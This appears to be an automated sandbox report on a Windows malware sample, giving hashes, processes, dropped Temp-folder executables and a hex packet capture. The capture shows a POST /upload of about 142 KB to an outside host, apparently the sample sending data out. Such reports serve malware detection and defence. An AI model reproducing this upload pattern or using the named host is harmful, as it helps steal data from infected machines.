Analysis Date2018-04-29 02:20:58
MD52da1c7f143f91f2bfe3d223a81f89c1b
SHA1680d856f96591a565c7f06ce12387809f95e72cf

Static Details:

File typePE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
PEhash

Runtime Details:

Screenshot

Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\680d856f96591a565c7f06ce12387809f95e72cf.exe

Creates FileC:\Users\Phil\AppData\Local\Temp\680d856f96591a565c7f06ce12387809f95e72cf.exe
Creates FileC:\Users\Phil\AppData\Local\Temp\rifaien2-CSv2H6Cb7VvSCZqh.exe
Creates FileC:\Users\Phil\AppData\Local\Temp\rifaien2-CSv2H6Cb7VvSCZqh.exe

Network Details:


Raw Pcap
0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   504f5354 202f7570 6c6f6164 20485454   POST /upload HTT
0x00000010 (00016)   502f312e 310d0a48 6f73743a 20776563   P/1.1..Host: wec
0x00000020 (00032)   616e2e68 61737468 652e7465 63686e6f   an.hasthe.techno
0x00000030 (00048)   6c6f6779 0d0a4163 63657074 3a202a2f   logy..Accept: */
0x00000040 (00064)   2a0d0a43 6f6e7465 6e742d4c 656e6774   *..Content-Lengt
0x00000050 (00080)   683a2031 34323735 360d0a45 78706563   h: 142756..Expec
0x00000060 (00096)   743a2031 30302d63 6f6e7469 6e75650d   t: 100-continue.
0x00000070 (00112)   0a436f6e 74656e74 2d547970 653a206d   .Content-Type: m
0x00000080 (00128)   756c7469 70617274 2f666f72 6d2d6461   ultipart/form-da
0x00000090 (00144)   74613b20 626f756e 64617279 3d2d2d2d   ta; boundary=---
0x000000a0 (00160)   2d2d2d2d 2d2d2d2d 2d2d2d2d 2d2d2d2d   ----------------
0x000000b0 (00176)   2d2d2d2d 2d363536 62656238 35653262   -----656beb85e2b
0x000000c0 (00192)   61323038 340d0a0d 0a                  a2084....


Strings